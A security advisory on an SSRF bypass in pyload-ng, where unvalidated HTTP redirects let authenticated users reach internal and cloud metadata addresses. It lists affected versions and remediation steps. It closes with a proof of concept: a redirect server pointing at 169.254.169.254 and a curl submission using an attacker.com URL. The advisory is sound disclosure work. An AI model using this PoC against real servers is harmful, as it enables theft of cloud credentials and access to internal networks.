### Vulnerability Overview **CVE-2026-33992** (related to CVE-2026-35459) is an SSRF (Server-Side Request Forgery) bypass vulnerability. * **Root Cause**: The previous fix only validated the initial download URL within `BaseDownloader.download()`. However, pycurl is configured to automatically follow HTTP redirects (`FOLLOWLOCATION=1` and `MAXREDIRS=10`), and the redirect destination addresses are never validated against SSRF filters. * **Exploitation**: An authenticated user with ADD permissions can submit a URL that redirects to an internal address, thereby bypassing SSRF restrictions. * **Severity**: High. ### Scope of Impact * **Affected Versions**: `pyload-ng` <= 0.5.0b3 * **Fixed Versions**: `pyload-ng` 0.5.0b3.dev97 * **Prerequisites**: The attacker must be an authenticated user with ADD permissions. * **Potential Impact**: * Access cloud metadata endpoints (AWS, GCP, DigitalOcean, Azure, etc.) to retrieve IAM credentials and instance identity. * Access internal network services (10.x, 172.16.x, 192.168.x). * Access local services (127.0.0.1). ### Remediation The following measures are recommended to remediate this issue: 1. **Disable Automatic Redirects**: Set `pycurl.FOLLOWLOCATION = 0` within `HTTPRequest.__init__()`. 2. **Manually Validate Redirects**: Implement redirect following logic manually within the `download` routine and perform SSRF validation at every step. 3. **Restrict Protocols**: Set `pycurl.REDIR_PROTOCOLS` to `pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS`. 4. **Add Callback Validation**: Implement a pycurl callback to validate the target IP before following a redirect. ### POC Code **1. Redirect Server Code:** ```python from http.server import HTTPServer, BaseHTTPRequestHandler class RedirectHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302) self.send_header("Location", "http://169.254.169.254/metadata/v1.json") self.end_headers() HTTPServer(("0.0.0.0", 8888), RedirectHandler).serve_forever() ``` **2. Submission Request Code (to pyload):** ```bash curl -b cookies.txt -X POST "http://target:8080/json/add_package" \ -d name=ssrf-test&add_dest=&add_links=http://attacker.com:8888/redirect ```